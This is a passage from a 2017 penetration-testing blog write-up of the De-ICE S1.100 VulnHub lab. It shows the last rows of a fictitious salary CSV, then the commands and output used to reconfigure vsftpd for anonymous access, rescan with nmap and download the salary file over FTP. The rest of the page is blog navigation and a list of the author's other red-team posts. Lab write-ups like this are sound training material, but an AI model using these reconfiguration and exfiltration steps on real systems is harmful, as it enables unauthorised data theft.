,4,Terry Thompson,&quot;$27,500.00&quot;,1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$225.00,$350.00,183200299,1278235
,5,Ben Benedict,&quot;$29,750.00&quot;,1,3,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$122.50,$247.50,183200299,2332546
,6,Erin Gennieg,&quot;$105,000.00&quot;,1,4,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1456567
,7,Paul Michael,&quot;$76,000.00&quot;,1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$100.00,$225.00,183200299,1446756
,8,Ester Long,&quot;$92,500.00&quot;,1,2,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1776782
,9,Adam Adams,&quot;$76,250.00&quot;,1,5,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,2250900
,10,Chad Coffee,&quot;$55,000.00&quot;,1,1,2.30%,28.00%,6.30%,1.45%,38.05%,$125.00,$0.00,$125.00,183200299,1590264
,11,,,,,,,,,0.00%,,,$0.00,0,0
,12,,,,,,,,,0.00%,,,$0.00,0,0
,13,,,,,,,,,0.00%,,,$0.00,0,0
,14,,,,,,,,,0.00%,,,$0.00,0,0
,15,,,,,,,,,0.00%,,,$0.00,0,0
,16,,,,,,,,,0.00%,,,$0.00,0,0
,17,,,,,,,,,0.00%,,,$0.00,0,0
,18,,,,,,,,,0.00%,,,$0.00,0,0
,19,,,,,,,,,0.00%,,,$0.00,0,0
,20,,,,,,,,,0.00%,,,$0.00,0,0
,21,,,,,,,,,0.00%,,,$0.00,0,0
,22,,,,,,,,,0.00%,,,$0.00,0,0
,23,,,,,,,,,0.00%,,,$0.00,0,0
,24,,,,,,,,,0.00%,,,$0.00,0,0
,25,,,,,,,,,0.00%,,,$0.00,0,0
</code></pre>

<h2 id="exfiltrate">Exfiltrate</h2>

<p>Modify <code>/etc/vsftp.conf</code> (you will probably need to lookup a <code>vi</code> cheat sheet!). Enable anonymous access by changing <code>anonymous_enable=NO</code> to <code>anonymous_enable=YES</code>; comment out the final line to run vsftp through inetd: <code>listen=YES</code> to <code>#listen=YES</code>.</p>

<p>Exit vi then run <code>modprobe capability</code>.</p>

<p>Run <code>nmap</code> again and you should have different results.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  nmap -n -p20,21 -A 192.168.1.100

Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-16 10:36 BST
Nmap scan report for 192.168.1.100
Host is up (0.000086s latency).
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
</code></pre>

<p>To get the file, you need to actually login as root.</p>

<pre><code class="language-text">╭─root@kali ~/vulnhub/de-ice_s1.100  
╰─➤  ftp 192.168.1.100
Connected to 192.168.1.100.
220 (vsFTPd 2.0.4)
Name (192.168.1.100:root): root
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp&gt; pwd
257 &quot;/root&quot;
ftp&gt; cd /home/ftp/incoming
250 Directory successfully changed.
ftp&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0          133038 Jul 16 00:17 salary_dec2003.csv
-r-xr-xr-x    1 0        0          133056 Jun 29  2007 salary_dec2003.csv.enc
226 Directory send OK.
ftp&gt; get salary_dec2003.csv
local: salary_dec2003.csv remote: salary_dec2003.csv
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for salary_dec2003.csv (133038 bytes).
226 File send OK.
133038 bytes received in 0.00 secs (48.2231 MB/s)
ftp&gt; bye
221 Goodbye.
</code></pre>
              
            </div>
          </div>
          <div id="post-footer" class="post-footer main-content-wrap">
            
              
                
                
                  <div class="post-footer-tags">
                    <span class="text-color-light text-small">TAGGED IN</span><br/>
                    
  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/de-ice/">de-ice</a>

  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/smtp/">smtp</a>

  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/ssh/">ssh</a>

  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/bruteforce/">bruteforce</a>

  <a class="tag tag--primary tag--small" href="https://rastamouse.me/tags/vulnhub/">vulnhub</a>

                  </div>
                
              
            
            <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/" data-tooltip="Automated Red Team Infrastructure Deployment with Terraform - Part 1">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/07/how-to-accidently-win-against-av/" data-tooltip="How to Accidently Win Against AV">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


            
              
                <div id="disqus_thread">
  <noscript>Please enable JavaScript to view the <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</div>
              
            
          </div>
        </article>
        <footer id="footer" class="main-content-wrap">
  <span class="copyrights">
    &copy; 2017 Rasta Mouse. All Rights Reserved
  </span>
</footer>

      </div>
      <div id="bottom-bar" class="post-bottom-bar" data-behavior="4">
        <div class="post-actions-wrap">
  <nav>
    <ul class="post-actions post-action-nav">
      
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/" data-tooltip="Automated Red Team Infrastructure Deployment with Terraform - Part 1">
          
            <i class="fa fa-angle-left"></i>
            <span class="hide-xs hide-sm text-small icon-ml">NEXT</span>
          </a>
        </li>
        <li class="post-action">
          
            <a class="post-action-btn btn btn--default tooltip--top" href="https://rastamouse.me/2017/07/how-to-accidently-win-against-av/" data-tooltip="How to Accidently Win Against AV">
          
            <span class="hide-xs hide-sm text-small icon-mr">PREVIOUS</span>
            <i class="fa fa-angle-right"></i>
          </a>
        </li>
      
    </ul>
  </nav>
  <ul class="post-actions post-action-share">
    
      <li class="post-action hide-lg hide-md hide-sm">
        <a class="post-action-btn btn btn--default btn-open-shareoptions" href="#btn-open-shareoptions">
          <i class="fa fa-share-alt"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-google-plus"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-facebook-official"></i>
        </a>
      </li>
      <li class="post-action hide-xs">
        <a class="post-action-btn btn btn--default" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
          <i class="fa fa-twitter"></i>
        </a>
      </li>
    
    
      <li class="post-action">
        <a class="post-action-btn btn btn--default" href="#disqus_thread">
          <i class="fa fa-comment-o"></i>
        </a>
      </li>
    
    <li class="post-action">
      
        <a class="post-action-btn btn btn--default" href="#">
      
        <i class="fa fa-list"></i>
      </a>
    </li>
  </ul>
</div>


      </div>
      <div id="share-options-bar" class="share-options-bar" data-behavior="4">
  <ul class="share-options">
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://plus.google.com/share?url=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
        <i class="fa fa-google-plus"></i><span>Share on Google Plus</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://www.facebook.com/sharer/sharer.php?u=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
        <i class="fa fa-facebook-official"></i><span>Share on Facebook</span>
      </a>
    </li>
    <li class="share-option">
      <a class="share-option-btn" target="new" href="https://twitter.com/intent/tweet?text=https%3a%2f%2frastamouse.me%2f2017%2f07%2fde-ice-s1.100%2f">
        <i class="fa fa-twitter"></i><span>Share on Twitter</span>
      </a>
    </li>
  </ul>
</div>
<div id="share-options-mask" class="share-options-mask"></div>
    </div>
    
    <div id="about">
  <div id="about-card">
    <div id="about-btn-close">
      <i class="fa fa-remove"></i>
    </div>
    
      <img id="about-card-picture" src="//www.gravatar.com/avatar/2b44f5ca5458931c49e1fa57da6705c1?s=110" alt="Author&#39;s picture" />
    
    <h4 id="about-card-name">Rasta Mouse</h4>
    
      <div id="about-card-bio">Taylor Swift fan, wannabe Red Teamer &amp; 1337 hax0r (in that order).</div>
    
    
      <div id="about-card-job">
        <i class="fa fa-briefcase"></i>
        <br/>
        Penetration Tester
      </div>
    
    
      <div id="about-card-location">
        <i class="fa fa-map-marker"></i>
        <br/>
        UK
      </div>
    
  </div>
</div>

    <div id="algolia-search-modal" class="modal-container">
  <div class="modal">
    <div class="modal-header">
      <span class="close-button"><i class="fa fa-close"></i></span>
      <a href="https://algolia.com" target="_blank" class="searchby-algolia text-color-light link-unstyled">
        <span class="searchby-algolia-text text-color-light text-small">by</span>
        <img class="searchby-algolia-logo" src="https://www.algolia.com/static_assets/images/press/downloads/algolia-light.svg">
      </a>
      <i class="search-icon fa fa-search"></i>
      <form id="algolia-search-form">
        <input type="text" id="algolia-search-input" name="search"
          class="form-control input--large search-input" placeholder="Search" />
      </form>
    </div>
    <div class="modal-body">
      <div class="no-result text-color-light text-center">no post found</div>
      <div class="results">
        
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/08/automated-red-team-infrastructure-deployment-with-terraform---part-1/">
                <h3 class="media-heading">Automated Red Team Infrastructure Deployment with Terraform - Part 1</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Aug 8, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h2 id="introduction">Introduction</h2>

<p>Deploying resiliant Red Team infrastructure can be quite a time consuming process.  This <a href="https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki">wiki</a> maintained by <a href="https://twitter.com/424f424f">Steve Borosh</a> and <a href="https://twitter.com/bluscreenofjeff">Jeff Dimmock</a> is probably the best public resource I&rsquo;ve seen in regards to design considerations and hardening tips.</p>

<p>For someone like myself, who destroys and stands fresh infrastructure up for each engagement, building everything by hand is a long, laborious process.  Anything that can be automated is a good thing.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/07/de-ice-s1.100/">
                <h3 class="media-heading">De-ICE S1.100</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jul 7, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><h1 id="scenario">Scenario</h1>

<p>The CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using Nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn&rsquo;t believe the company is insecure, he has contracted you to look at only one server - an old system that only has a web-based list of the company&rsquo;s contact information.</p>

<p>The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/07/how-to-accidently-win-against-av/">
                <h3 class="media-heading">How to Accidently Win Against AV</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jul 7, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>Computer viruses have been around since as early as the 1970&rsquo;s - the eternal battle between virus creators and antivirus solutions continues to wage over 40 years later.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/cobalt-strike---spawn-as/">
                <h3 class="media-heading">Cobalt Strike - Spawn As</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><pre><code>beacon&gt; getuid
[*] You are CYBER-LANCE\sgomez

beacon&gt; spawnas cyber-lance\tswift Passw0rd! smb
</code></pre>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/06/psexec-much/">
                <h3 class="media-heading">PsExec Much?</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Jun 6, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently completed an adversary simulation and thought I would write a short post about some of my experiences.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/playing-with-cuckoo/">
                <h3 class="media-heading">Playing with Cuckoo</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>After the release and complete hubbub that <a href="https://en.wikipedia.org/wiki/WannaCry_ransomware_attack">WannaCry</a> caused, I thought it would be fun to play with <a href="https://cuckoosandbox.org/">Cuckoo Sandbox</a>.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/2017/05/a-citrix-story/">
                <h3 class="media-heading">A Citrix Story</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  May 5, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"><p>I recently had the pleasure of partaking in a Citrix Virtual Desktop infrastructure assessment.</p>

<p></p></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
          <div class="media">
            
            <div class="media-body">
              <a class="link-unstyled" href="https://rastamouse.me/post/">
                <h3 class="media-heading">Posts</h3>
              </a>
              <span class="media-meta">
                <span class="media-date text-small">
                  Aug 8, 2017
                </span>
              </span>
              <div class="media-content hide-xs font-merryweather"></div>
            </div>
            <div style="clear:both;"></div>
            <hr>
          </div>
        
      </div>
    </div>
    <div class="modal-footer">
      <p class="results-count text-medium"
         data-message-zero="no post found"
         data-message-one="1 post found"
         data-message-other="{n} posts found">
         8 posts found
      </p>
    </div>
  </div>
</div>
    
  
    
    <div id="cover" style="background-image:url('https://rastamouse.me/images/cover.jpg');"></div>
  


    
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.8.0/highlight.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/jquery.fancybox.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/fancybox/2.1.4/helpers/jquery.fancybox-thumbs.min.js"></script>


<script src="https://rastamouse.me/js/script-wl33z0n6ocaypepiqrazthtivfrliqijej4rq8ek8gvrv1awftmgjuv8k4zc.min.js"></script>

<script>
$(document).ready(function() {
  hljs.configure({ classPrefix: '', useBR: false });
  $('pre.code-highlight').each(function(i, block) {
    var code = "";
    hljs.highlightAuto(block.innerText).value.split(/\r\n|\r|\n/).forEach(function(line) {
      code += "<span class=\"line\">" + line + "</span><br>";
    });
    if (code.length > 0) {
      block.innerHTML = code;  
    }
  });
  $('pre > code').each(function(i, block) {
    $(this).addClass('codeblock');
    hljs.highlightBlock(block);
  });
});
</script>

  
    
      <script>
        var disqus_config = function () {
          this.page.url = 'https:\/\/rastamouse.me\/2017\/07\/de-ice-s1.100\/';
          
            this.page.identifier = '\/2017\/07\/de-ice-s1.100\/'
          
        };
        (function() {
          
          
          if (window.location.hostname == "localhost") {
            return;
          }
          var d = document, s = d.createElement('script');
          var disqus_shortname = 'rastamouse';
          s.src = '//' + disqus_shortname + '.disqus.com/embed.js';

          s.setAttribute('data-timestamp', +new Date());
          (d.head || d.body).appendChild(s);
        })();
      </script>
    
  





    
  </body>
</html>

